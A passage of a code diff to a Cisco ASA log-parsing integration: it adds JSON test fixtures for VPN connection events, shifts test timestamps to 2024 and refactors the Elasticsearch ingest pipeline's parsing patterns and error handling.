<464_0273> IP <192.168.0.1> First UDP SVC connection established for SVC session. Oct 20 2021 16:41:52: %ASA-5-722033: Group User <464_0273> IP <192.168.0.1> First TCP SVC connection established for SVC session. Oct 20 2021 16:41:52: %ASA-4-722034: Group User <464_0273> IP <192.168.0.1> New TCP SVC connection, no existing connection. diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log-expected.json index b0a686cf667..dc9609fe8a9 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log-expected.json @@ -378,6 +378,303 @@ "preserve_original_event" ] }, + { + "@timestamp": "2024-01-24T15:24:40.000Z", + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "firewall-rule", + "category": [ + "network" + ], + "code": "722022", + "kind": "event", + "original": "<190>Jan 24 2024 15:24:40 XYZhost1 : %ASA-6-722022: Group User IP <67.43.156.118> TCP SVC connection established without compression", + "reason": "TCP SVC connection established without compression", + "severity": 6, + "timezone": "UTC", + "type": [ + "info" + ] + }, + "host": { + "hostname": "XYZhost1" + }, + "log": { + "level": "informational", + "syslog": { + "facility": { + "code": 23 + }, + "priority": 190, + "severity": { + "code": 6 + } + } + }, + "observer": { + "hostname": "XYZhost1", + "product": "asa", + "type": "firewall", + "vendor": "Cisco" + }, + "related": { + "hosts": [ + "XYZhost1", + "myorg.com" + ], + "ip": [ + "67.43.156.118" + ], + "user": [ + "src_user" + ] + }, + "source": { + "address": "67.43.156.118", + "as": { + "number": 35908 + }, + "geo": { + "continent_name": "Asia", + "country_iso_code": "BT", + "country_name": "Bhutan", + "location": { + "lat": 27.5, + "lon": 90.5 + } + }, + "ip": "67.43.156.118", + "user": { + "domain": "myorg.com", + "email": "src_user@myorg.com", + "group": { + "name": "MY-MFA" + }, + "name": "src_user" + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-01-24T15:25:23.000Z", + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "firewall-rule", + "category": [ + "network" + ], + "code": "722023", + "kind": "event", + "original": "<190>Jan 24 2024 15:25:23 XYZhost1 : %ASA-6-722023: Group User IP <81.2.69.142> UDP SVC connection terminated without compression", + "reason": "UDP SVC connection terminated without compression", + "severity": 6, + "timezone": "UTC", + "type": [ + "info" + ] + }, + "host": { + "hostname": "XYZhost1" + }, + "log": { + "level": "informational", + "syslog": { + "facility": { + "code": 23 + }, + "priority": 190, + "severity": { + "code": 6 + } + } + }, + "observer": { + "hostname": "XYZhost1", + "product": "asa", + "type": "firewall", + "vendor": "Cisco" + }, + "related": { + "hosts": [ + "XYZhost1", + "myorg.com" + ], + "ip": [ + "81.2.69.142" + ], + "user": [ + "src_user" + ] + }, + "source": { + "address": "81.2.69.142", + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.142", + "user": { + "domain": "myorg.com", + "email": "src_user@myorg.com", + "group": { + "name": "MGMT_Tunnel" + }, + "name": "src_user" + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-02-21T09:53:46.000Z", + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "firewall-rule", + "category": [ + "network" + ], + "code": "722022", + "kind": "event", + "original": "<190>Feb 21 2024 09:53:46 xxxxxx : %ASA-6-722022: Group MY-MFA User myuser@email.com IP 192.168.0.12 UDP SVC connection established without compression", + "reason": "UDP SVC connection established without compression", + "severity": 6, + "timezone": "UTC", + "type": [ + "info" + ] + }, + "host": { + "hostname": "xxxxxx" + }, + "log": { + "level": "informational", + "syslog": { + "facility": { + "code": 23 + }, + "priority": 190, + "severity": { + "code": 6 + } + } + }, + "observer": { + "hostname": "xxxxxx", + "product": "asa", + "type": "firewall", + "vendor": "Cisco" + }, + "related": { + "hosts": [ + "xxxxxx", + "email.com" + ], + "ip": [ + "192.168.0.12" + ], + "user": [ + "myuser" + ] + }, + "source": { + "address": "192.168.0.12", + "ip": "192.168.0.12", + "user": { + "domain": "email.com", + "email": "myuser@email.com", + "group": { + "name": "MY-MFA" + }, + "name": "myuser" + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-02-21T09:55:01.000Z", + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "firewall-rule", + "category": [ + "network" + ], + "code": "722023", + "kind": "event", + "original": "<190>Feb 21 2024 09:55:01 xxxxxx: %ASA-6-722023: Group MGMT_Tunnel User my123.org.com IP 192.168.0.228 UDP SVC connection terminated without compression", + "reason": "UDP SVC connection terminated without compression", + "severity": 6, + "timezone": "UTC", + "type": [ + "info" + ] + }, + "host": { + "hostname": "xxxxxx" + }, + "log": { + "level": "informational", + "syslog": { + "facility": { + "code": 23 + }, + "priority": 190, + "severity": { + "code": 6 + } + } + }, + "observer": { + "hostname": "xxxxxx", + "product": "asa", + "type": "firewall", + "vendor": "Cisco" + }, + "related": { + "hosts": [ + "xxxxxx" + ], + "ip": [ + "192.168.0.228" + ], + "user": [ + "my123.org.com" + ] + }, + "source": { + "address": "192.168.0.228", + "ip": "192.168.0.228", + "user": { + "group": { + "name": "MGMT_Tunnel" + }, + "name": "my123.org.com" + } + }, + "tags": [ + "preserve_original_event" + ] + }, { "@timestamp": "2021-10-20T16:41:52.000Z", "ecs": { diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json index fff51c462d4..58ab06e6df7 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json @@ -1,7 +1,7 @@ { "expected": [ { - "@timestamp": "2023-01-01T01:00:27.000Z", + "@timestamp": "2024-01-01T01:00:27.000Z", "ecs": { "version": "8.11.0" }, @@ -45,7 +45,7 @@ ] }, { - "@timestamp": "2023-01-01T01:00:30.000Z", + "@timestamp": "2024-01-01T01:00:30.000Z", "ecs": { "version": "8.11.0" }, @@ -86,7 +86,7 @@ ] }, { - "@timestamp": "2023-01-01T01:02:12.000Z", + "@timestamp": "2024-01-01T01:02:12.000Z", "cisco": { "asa": { "source_interface": "eth0" diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-non-canonical.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-non-canonical.log-expected.json index 0edeb8dbe86..382072c0069 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-non-canonical.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-non-canonical.log-expected.json @@ -1,7 +1,7 @@ { "expected": [ { - "@timestamp": "2023-07-15T13:38:14.000Z", + "@timestamp": "2024-07-15T13:38:14.000Z", "cisco": { "asa": { "connection_id": "3263493120", @@ -81,7 +81,7 @@ ] }, { - "@timestamp": "2023-07-15T13:38:11.000Z", + "@timestamp": "2024-07-15T13:38:11.000Z", "cisco": { "asa": { "connection_id": "3263492189", @@ -165,7 +165,7 @@ ] }, { - "@timestamp": "2023-07-15T13:38:08.000Z", + "@timestamp": "2024-07-15T13:38:08.000Z", "cisco": { "asa": { "connection_id": "743108828", @@ -249,7 +249,7 @@ ] }, { - "@timestamp": "2023-07-15T13:38:03.000Z", + "@timestamp": "2024-07-15T13:38:03.000Z", "cisco": { "asa": { "connection_id": "743108738", @@ -333,7 +333,7 @@ ] }, { - "@timestamp": "2023-07-15T13:36:59.000Z", + "@timestamp": "2024-07-15T13:36:59.000Z", "cisco": { "asa": { "source_interface": "SH_INFRA_MGT" @@ -403,7 +403,7 @@ ] }, { - "@timestamp": "2023-07-15T13:36:39.000Z", + "@timestamp": "2024-07-15T13:36:39.000Z", "cisco": { "asa": { "source_interface": "outside" @@ -491,7 +491,7 @@ ] }, { - "@timestamp": "2023-07-15T13:38:47.000Z", + "@timestamp": "2024-07-15T13:38:47.000Z", "cisco": { "asa": { "destination_interface": "outside", @@ -525,11 +525,11 @@ ], "code": "305012", "duration": 41000000000, - "end": "2023-07-15T13:38:47.000Z", + "end": "2024-07-15T13:38:47.000Z", "kind": "event", "original": "Jul 15 13:38:47 216.160.83.56 : %ASA-6-305012: Teardown dynamic UDP translation from SERVERS:exp-wait/62409 to outside:81.2.69.142/62409 duration 0:00:41", "severity": 6, - "start": "2023-07-15T13:38:06.000Z", + "start": "2024-07-15T13:38:06.000Z", "timezone": "UTC", "type": [ "connection", @@ -581,7 +581,7 @@ ] }, { - "@timestamp": "2023-07-15T13:37:33.000Z", + "@timestamp": "2024-07-15T13:37:33.000Z", "cisco": { "asa": { "destination_interface": "outside", @@ -615,11 +615,11 @@ ], "code": "305012", "duration": 30000000000, - "end": "2023-07-15T13:37:33.000Z", + "end": "2024-07-15T13:37:33.000Z", "kind": "event", "original": "Jul 15 13:37:33 216.160.83.56 : %ASA-6-305012: Teardown dynamic UDP translation from SERVERS:exp-wait/56421 to outside:81.2.69.142/56421 duration 0:00:30", "severity": 6, - "start": "2023-07-15T13:37:03.000Z", + "start": "2024-07-15T13:37:03.000Z", "timezone": "UTC", "type": [ "connection", @@ -671,7 +671,7 @@ ] }, { - "@timestamp": "2023-07-15T13:39:04.000Z", + "@timestamp": "2024-07-15T13:39:04.000Z", "cisco": { "asa": { "destination_interface": "outside", @@ -757,7 +757,7 @@ ] }, { - "@timestamp": "2023-07-15T13:37:02.000Z", + "@timestamp": "2024-07-15T13:37:02.000Z", "cisco": { "asa": { "destination_interface": "outside", @@ -843,7 +843,7 @@ ] }, { - "@timestamp": "2023-07-15T13:18:06.000Z", + "@timestamp": "2024-07-15T13:18:06.000Z", "cisco": { "asa": { "destination_interface": "SH_OSS", @@ -938,7 +938,7 @@ ] }, { - "@timestamp": "2023-07-15T01:18:01.000Z", + "@timestamp": "2024-07-15T01:18:01.000Z", "cisco": { "asa": { "destination_interface": "SH_OSS", @@ -1033,7 +1033,7 @@ ] }, { - "@timestamp": "2023-07-15T13:30:09.000Z", + "@timestamp": "2024-07-15T13:30:09.000Z", "cisco": { "asa": { "icmp_code": 0, @@ -1108,7 +1108,7 @@ ] }, { - "@timestamp": "2023-07-14T01:45:09.000Z", + "@timestamp": "2024-07-14T01:45:09.000Z", "cisco": { "asa": { "icmp_code": 0, @@ -1183,7 +1183,7 @@ ] }, { - "@timestamp": "2023-07-15T13:30:09.000Z", + "@timestamp": "2024-07-15T13:30:09.000Z", "cisco": { "asa": { "icmp_code": 0, @@ -1258,7 +1258,7 @@ ] }, { - "@timestamp": "2023-07-14T01:45:09.000Z", + "@timestamp": "2024-07-14T01:45:09.000Z", "cisco": { "asa": { "icmp_code": 0, @@ -1333,7 +1333,7 @@ ] }, { - "@timestamp": "2023-07-15T12:18:51.000Z", + "@timestamp": "2024-07-15T12:18:51.000Z", "ecs": { "version": "8.11.0" }, @@ -1408,7 +1408,7 @@ ] }, { - "@timestamp": "2023-07-01T09:27:13.000Z", + "@timestamp": "2024-07-01T09:27:13.000Z", "ecs": { "version": "8.11.0" }, @@ -1480,7 +1480,7 @@ ] }, { - "@timestamp": "2023-06-14T01:22:47.000Z", + "@timestamp": "2024-06-14T01:22:47.000Z", "destination": { "address": "mirror", "domain": "mirror" @@ -1540,7 +1540,7 @@ } }, { - "@timestamp": "2023-07-01T09:27:13.000Z", + "@timestamp": "2024-07-01T09:27:13.000Z", "cisco": { "asa": { "rejection_reason": "AAA failure" @@ -1636,7 +1636,7 @@ ] }, { - "@timestamp": "2023-07-01T09:27:13.000Z", + "@timestamp": "2024-07-01T09:27:13.000Z", "cisco": { "asa": { "rejection_reason": "Account has been disabled" diff --git a/packages/cisco_asa/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_asa/data_stream/log/elasticsearch/ingest_pipeline/default.yml index c2cc4dd717f..cf60404992e 100644 --- a/packages/cisco_asa/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_asa/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -1,21 +1,27 @@ --- description: "Pipeline for Cisco ASA logs" processors: - - rename: + - set: + field: event.original + copy_from: message + - remove: field: message - target_field: event.original - tag: "rename_message" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" - ignore_missing: true - if: ctx.event?.original == null - set: field: ecs.version value: '8.11.0' + - set: + field: event.kind + value: event + - set: + field: event.category + value: [ network ] + - set: + field: event.type + value: [ info ] + - set: + field: event.action + value: firewall-rule + # # Parse the syslog header # @@ -23,7 +29,7 @@ processors: # from the header and stores the message contents in _temp_.full_message. - grok: field: event.original - tag: "grok_event_original" + tag: grok_event_original if: ctx.event?.original != null patterns: - "(?:%{SYSLOG_HEADER})?\\s*%{GREEDYDATA:_temp_.full_message}" @@ -41,15 +47,9 @@ processors: # exactly match the syntax for firepower management logs PROCESS_HOST: "(?:%{PROCESS:process.name}:\\s%{SYSLOGHOST:host.name})" HOST_PROCESS: "(?:%{SYSLOGHOST:host.hostname}:?\\s+)?(?:%{PROCESS:process.name}?(?:\\[%{POSINT:process.pid:long}\\])?)?" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" - script: lang: painless - tag: "script_log_syslog" + tag: script_log_syslog source: | if (ctx.log?.syslog?.priority != null) { def severity = new HashMap(); @@ -59,10 +59,6 @@ processors: facility['code'] = ctx.log.syslog.priority>>3; ctx.log.syslog['facility'] = facility; } - on_failure: - - append: - field: error.message - value: "Processor {{{ _ingest.on_failure_processor_type }}} with tag {{{ _ingest.on_failure_processor_tag }}} in pipeline {{{ _ingest.on_failure_pipeline }}} failed with message: {{{ _ingest.on_failure_message }}}" # # Parse FTD/ASA style message @@ -71,7 +67,7 @@ processors: - grok: field: _temp_.full_message if: ctx._temp_?.full_message != null - tag: "grok_full_message" + tag: grok_full_message patterns: - "%{FTD_PREFIX}-(?:%{FTD_SUFFIX:_temp_.cisco.suffix}-)?%{NONNEGINT:event.severity:int}-%{POSINT:_temp_.cisco.message_id}?:?\\s*%{GREEDYDATA:message}" # Before version 6.3, messages for connection, security intelligence, and intrusion events didn't include an event type ID in the message header. @@ -80,12 +76,6 @@ processors: FTD_SUFFIX: "[^0-9-]+" # Before version 6.3, FTD used ASA prefix in syslog messages FTD_PREFIX: "%{DATA}%(?:[A-Z]+)" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" # # Create missing fields when no %FTD label is present @@ -179,10 +169,6 @@ processors: - "MMM dd yyyy HH:mm:ss z" - "EEE MMM d yyyy HH:mm:ss z" - "EEE MMM dd yyyy HH:mm:ss z" - on_failure: - - append: - field: error.message - value: "{{{ _ingest.on_failure_message }}}" # # Set log.level @@ -224,84 +210,44 @@ processors: # Firewall messages # # This set of messages is shared between FTD and ASA. - - set: - if: 'ctx._temp_?.cisco?.message_id != ""' - field: "event.action" - value: "firewall-rule" - dissect: if: "ctx._temp_.cisco.message_id == '106001'" - tag: "dissect_message_id_106001" + tag: parse_106001 field: "message" description: "106001" - pattern: "%{network.direction} %{network.transport} connection %{event.outcome} from %{source.address}/%{source.port} to %{destination.address}/%{destination.port} flags %{} on interface %{_temp_.cisco.source_interface}" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" + pattern: "%{network.direction} %{network.transport} connection denied from %{source.address}/%{source.port} to %{destination.address}/%{destination.port} flags %{} on interface %{_temp_.cisco.source_interface}" - dissect: if: "ctx._temp_.cisco.message_id == '106002'" - tag: "dissect_message_id_106002" + tag: parse_106002 field: "message" description: "106002" - pattern: "%{network.transport} Connection %{event.outcome} by %{network.direction} list %{_temp_.cisco.list_id} src %{source.address} dest %{destination.address}" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" + pattern: "%{network.transport} Connection denied by %{network.direction} list %{_temp_.cisco.list_id} src %{source.address} dest %{destination.address}" - dissect: if: "ctx._temp_.cisco.message_id == '106006'" - tag: "dissect_message_id_106006" + tag: parse_106006 field: "message" description: "106006" - pattern: "%{event.outcome} %{network.direction} %{network.transport} from %{source.address}/%{source.port} to %{destination.address}/%{destination.port} on interface %{_temp_.cisco.source_interface}" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" + pattern: "Deny %{network.direction} %{network.transport} from %{source.address}/%{source.port} to %{destination.address}/%{destination.port} on interface %{_temp_.cisco.source_interface}" - dissect: if: "ctx._temp_.cisco.message_id == '106007'" - tag: "dissect_message_id_106007" + tag: parse_106007 field: "message" description: "106007" - pattern: "%{event.outcome} %{network.direction} %{network.transport} from %{source.address}/%{source.port} to %{destination.address}/%{destination.port} due to %{network.protocol} %{}" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" + pattern: "Deny %{network.direction} %{network.transport} from %{source.address}/%{source.port} to %{destination.address}/%{destination.port} due to %{network.protocol} %{}" - grok: if: "ctx._temp_.cisco.message_id == '106010'" - tag: "grok_message_id_106010" + tag: parse_106010 field: "message" description: "106010" patterns: - - "%{NOTSPACE:event.outcome} %{NOTSPACE:network.direction} ((protocol %{POSINT:network.iana_number})|%{NOTSPACE:network.transport}) src %{NOTSPACE:_temp_.cisco.source_interface}:%{NOTSPACE:source.address}/%{POSINT:source.port} (%{DATA})?dst %{NOTSPACE:_temp_.cisco.destination_interface}:%{NOTSPACE:destination.address}/%{POSINT:destination.port}(%{GREEDYDATA})?" - - "%{NOTSPACE:event.outcome} %{NOTSPACE:network.direction} ((protocol %{POSINT:network.iana_number})|%{NOTSPACE:network.transport}) src %{NOTSPACE:_temp_.cisco.source_interface}:%{NOTSPACE:source.address}(/%{POSINT:source.port})? (%{DATA})?dst %{NOTSPACE:_temp_.cisco.destination_interface}:%{NOTSPACE:destination.address}(/%{POSINT:destination.port})?(%{GREEDYDATA})?" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" + - "Deny %{NOTSPACE:network.direction} ((protocol %{POSINT:network.iana_number})|%{NOTSPACE:network.transport}) src %{NOTSPACE:_temp_.cisco.source_interface}:%{NOTSPACE:source.address}/%{POSINT:source.port} (%{DATA})?dst %{NOTSPACE:_temp_.cisco.destination_interface}:%{NOTSPACE:destination.address}/%{POSINT:destination.port}(%{GREEDYDATA})?" + - "Deny %{NOTSPACE:network.direction} ((protocol %{POSINT:network.iana_number})|%{NOTSPACE:network.transport}) src %{NOTSPACE:_temp_.cisco.source_interface}:%{NOTSPACE:source.address}(/%{POSINT:source.port})? (%{DATA})?dst %{NOTSPACE:_temp_.cisco.destination_interface}:%{NOTSPACE:destination.address}(/%{POSINT:destination.port})?(%{GREEDYDATA})?" - dissect: if: "ctx._temp_.cisco.message_id == '106013'" - tag: "dissect_message_id_106013" + tag: parse_106013 field: "message" description: "106013" pattern: "Dropping echo request from %{source.address} to PAT address %{destination.address}" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" - set: if: "ctx._temp_.cisco.message_id == '106013'" field: "network.transport" @@ -314,82 +260,63 @@ processors: value: inbound - grok: if: "ctx._temp_.cisco.message_id == '106014'" - tag: "grok_message_id_106014" + tag: parse_106014 field: "message" description: "106014" patterns: - - "%{NOTSPACE:event.outcome} %{NOTSPACE:network.direction} %{NOTSPACE:network.transport} src %{NOTSPACE:_temp_.cisco.source_interface}:%{NOTSPACE:source.address} (%{DATA})?dst %{NOTSPACE:_temp_.cisco.destination_interface}:(?[^ (]*)(%{GREEDYDATA})?" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" + - "Deny %{NOTSPACE:network.direction} %{NOTSPACE:network.transport} src %{NOTSPACE:_temp_.cisco.source_interface}:%{NOTSPACE:source.address} (%{DATA})?dst %{NOTSPACE:_temp_.cisco.destination_interface}:(?[^ (]*)(%{GREEDYDATA})?" - grok: if: "ctx._temp_.cisco.message_id == '106015'" - tag: "grok_message_id_106015" + tag: parse_106015 field: "message" description: "106015" patterns: - - "%{NOTSPACE:event.outcome} %{NOTSPACE:network.transport} %{NOTSPACE} %{NOTSPACE} from %{IPORHOST:source.address}/%{POSINT:source.port} to %{IPORHOST:destination.address}/%{POSINT:destination.port} flags %{DATA} on interface %{NOTSPACE:_temp_.cisco.source_interface}" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" + - "Deny %{NOTSPACE:network.transport} %{NOTSPACE} %{NOTSPACE} from %{IPORHOST:source.address}/%{POSINT:source.port} to %{IPORHOST:destination.address}/%{POSINT:destination.port} flags %{DATA} on interface %{NOTSPACE:_temp_.cisco.source_interface}" - dissect: if: "ctx._temp_.cisco.message_id == '106016'" - tag: "dissect_message_id_106016" + tag: parse_106016 field: "message" - pattern: "%{event.outcome} IP spoof from (%{source.address}) to %{destination.address} on interface %{_temp_.cisco.source_interface}" + pattern: "Deny IP spoof from (%{source.address}) to %{destination.address} on interface %{_temp_.cisco.source_interface}" description: "106016" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" - dissect: if: "ctx._temp_.cisco.message_id == '106017'" - tag: "dissect_message_id_106017" + tag: parse_106017 field: "message" - pattern: "%{event.outcome} IP due to Land Attack from %{source.address} to %{destination.address}" + pattern: "Deny IP due to Land Attack from %{source.address} to %{destination.address}" description: "106017" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" - dissect: if: "ctx._temp_.cisco.message_id == '106018'" + tag: parse_106018 field: "message" - pattern: "%{network.transport} packet type %{_temp_.cisco.icmp_type} %{event.outcome} by %{network.direction} list %{_temp_.cisco.list_id} src %{source.address} dest %{destination.address}" + pattern: "%{network.transport} packet type %{_temp_.cisco.icmp_type} denied by %{network.direction} list %{_temp_.cisco.list_id} src %{source.address} dest %{destination.address}" description: "106018" - dissect: if: "ctx._temp_.cisco.message_id == '106020'" + tag: parse_106020 field: "message" - pattern: "%{event.outcome} IP teardrop fragment (size = %{}, offset = %{}) from %{source.address} to %{destination.address}" + pattern: "Deny IP teardrop fragment (size = %{}, offset = %{}) from %{source.address} to %{destination.address}" description: "106020" - dissect: if: "ctx._temp_.cisco.message_id == '106021'" + tag: parse_106021 field: "message" - pattern: "%{event.outcome} %{network.transport} reverse path check from %{source.address} to %{destination.address} on interface %{_temp_.cisco.source_interface}" + pattern: "Deny %{network.transport} reverse path check from %{source.address} to %{destination.address} on interface %{_temp_.cisco.source_interface}" description: "106021" - dissect: if: "ctx._temp_.cisco.message_id == '106022'" + tag: parse_106022 field: "message" - pattern: "%{event.outcome} %{network.transport} connection spoof from %{source.address} to %{destination.address} on interface %{_temp_.cisco.source_interface}" + pattern: "Deny %{network.transport} connection spoof from %{source.address} to %{destination.address} on interface %{_temp_.cisco.source_interface}" description: "106022" - grok: if: "ctx._temp_.cisco.message_id == '106023'" + tag: parse_106023 field: "message" description: "106023" patterns: - - ^%{NOTSPACE:event.outcome} ((protocol %{POSINT:network.iana_number})|%{NOTSPACE:network.transport}) src %{NOTCOLON:_temp_.cisco.source_interface}:%{IPORHOST:source.address}(/%{NUMBER:source.port})?\s*(\(%{CISCO_USER_OR_SGT_SRC}\) )?dst %{NOTCOLON:_temp_.cisco.destination_interface}:%{IPORHOST:destination.address}(/%{NUMBER:destination.port})?%{DATA}by access-group "%{NOTSPACE:_temp_.cisco.list_id}" + - ^Deny ((protocol %{POSINT:network.iana_number})|%{NOTSPACE:network.transport}) src %{NOTCOLON:_temp_.cisco.source_interface}:%{IPORHOST:source.address}(/%{NUMBER:source.port})?\s*(\(%{CISCO_USER_OR_SGT_SRC}\) )?dst %{NOTCOLON:_temp_.cisco.destination_interface}:%{IPORHOST:destination.address}(/%{NUMBER:destination.port})?%{DATA}by access-group "%{NOTSPACE:_temp_.cisco.list_id}" pattern_definitions: - HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62}))*(\\.?|\\b)" + HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z\\-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z\\-_]{0,62}))*(\\.?|\\b)" IPORHOST: "(?:%{IP}|%{HOSTNAME})" NOTCOLON: "[^:]*" CISCO_USER_OR_SGT_SRC: (?:%{CISCO_USER:_temp_.cisco.source_user_or_sgt}|%{CISCO_SGT:_temp_.cisco.source_user_or_sgt}|\((?:%{CISCO_USER:_temp_.cisco.source_user_or_sgt}|%{CISCO_SGT:_temp_.cisco.source_user_or_sgt})\)) @@ -397,56 +324,51 @@ processors: CISCO_SGT: (?:, *)?%{NUMBER}(?::%{WORD})? - dissect: if: "ctx._temp_.cisco.message_id == '106027'" + tag: parse_106027 field: "message" description: "106027" - pattern: '%{} %{event.outcome} src %{source.address} dst %{destination.address} by access-group "%{_temp_.cisco.list_id}"' + pattern: '%{} Deny src %{source.address} dst %{destination.address} by access-group "%{_temp_.cisco.list_id}"' - dissect: if: "ctx._temp_.cisco.message_id == '106100'" + tag: parse_106100 field: "message" description: "106100" - pattern: "access-list %{_temp_.cisco.list_id} %{event.outcome} %{network.transport} %{_temp_.cisco.source_interface}/%{source.address}(%{source.port})%{}-> %{_temp_.cisco.destination_interface}/%{destination.address}(%{destination.port})%{}" + pattern: "access-list %{_temp_.cisco.list_id} %{_temp_.outcome} %{network.transport} %{_temp_.cisco.source_interface}/%{source.address}(%{source.port})%{}-> %{_temp_.cisco.destination_interface}/%{destination.address}(%{destination.port})%{}" - dissect: - if: "ctx._temp_.cisco.message_id == '106102' || ctx._temp_.cisco.message_id == '106103'" + if: "ctx._temp_.cisco.message_id == '106102'" + tag: parse_106102 + field: "message" + description: "106102" + pattern: "access-list %{_temp_.cisco.list_id} %{_temp_.outcome} %{network.transport} for user %{user.name} %{_temp_.cisco.source_interface}/%{source.address}(%{source.port})%{}-> %{_temp_.cisco.destination_interface}/%{destination.address}(%{destination.port})%{}" + - dissect: + if: "ctx._temp_.cisco.message_id == '106103'" + tag: parse_106103 field: "message" description: "106103" - pattern: "access-list %{_temp_.cisco.list_id} %{event.outcome} %{network.transport} for user %{user.name} %{_temp_.cisco.source_interface}/%{source.address}(%{source.port})%{}-> %{_temp_.cisco.destination_interface}/%{destination.address}(%{destination.port})%{}" + pattern: "access-list %{_temp_.cisco.list_id} denied %{network.transport} for user %{user.name} %{_temp_.cisco.source_interface}/%{source.address}(%{source.port})%{}-> %{_temp_.cisco.destination_interface}/%{destination.address}(%{destination.port})%{}" - dissect: if: "ctx._temp_.cisco.message_id == '111004'" + tag: parse_111004 field: "message" description: "111004" - pattern: "%{source.address} end configuration: %{_temp_.cisco.cli_outcome}" - - set: - field: event.outcome - description: "111004" - value: "success" - 